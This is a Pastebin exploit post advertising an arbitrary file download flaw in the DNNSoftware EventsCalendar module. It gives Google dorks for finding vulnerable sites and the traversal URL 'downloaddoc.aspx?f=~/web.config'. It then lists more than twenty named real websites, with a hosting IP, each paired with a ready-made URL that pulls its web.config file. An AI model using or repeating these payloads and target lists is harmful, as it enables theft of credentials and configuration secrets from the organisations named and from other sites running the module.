Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : DNNSoftware EventsCalendar Modules 1.x Arbitrary File Download
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 18/01/2019
- # Vendor Homepage : dnnsoftware.com
- # Software Information Link : store.dnnsoftware.com/home/product-details/events-calendar
- # Software Version : 1.x and All Versions
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : intext:''Copyright 2019 by Associated Builders and Contractors''
- inurl:''/desktopmodules/eventscalendar/''
- # Vulnerability Type : CWE-16 [ Configuration ]
- ####################################################################
- # Description :
- *************
- * Events Calendar is a calendar to add and display events with time and description in rich text editor.
- * DotNetNuke DNNSoftware Events Calendar Modules 1.x and other versions
- is prone to a vulnerability that lets attackers download arbitrary files because
- the application fails to sufficiently verify user-supplied input.
- * This may allow an attacker to gain access to sensitive information, which may aid in launching further attacks.
- * The attacker can download and read all and any files known by the name via '?f=' parameter.
- # Arbitrary File Download Exploit :
- *******************************
- /desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
- /desktopmodules/eventscalendar/downloaddoc.aspx?f=[DOWNLOAD-ANY-FILE]
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- Note : (38.95.37.77) => There are 73 domains hosted on this server.
- [+] abcga.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
- [+] abcgmc.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
- [+] mnabc.com/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
- [+] abclaventura.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
- [+] abccarolinas.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
- [+] abcnjc.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
- [+] abcpnw.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
- [+] abcwestwa.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
- [+] abc-chesapeake.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
- [+] ocl.net/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
- [+] aeawave.com/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
- [+] tkhobby.nu/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
- [+] abcark.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
- [+] av-warehouse.com/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
- [+] nocabc.com/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
- [+] ezt.ca/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
- [+] abccentralcal.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
- [+] abcwpa.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
- [+] abcnevada.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
- [+] abcsocal.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
- [+] ctabc.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
- [+] abcalaska.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
- [+] abcfirstcoast.com/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Add Comment
Please, Sign In to add comment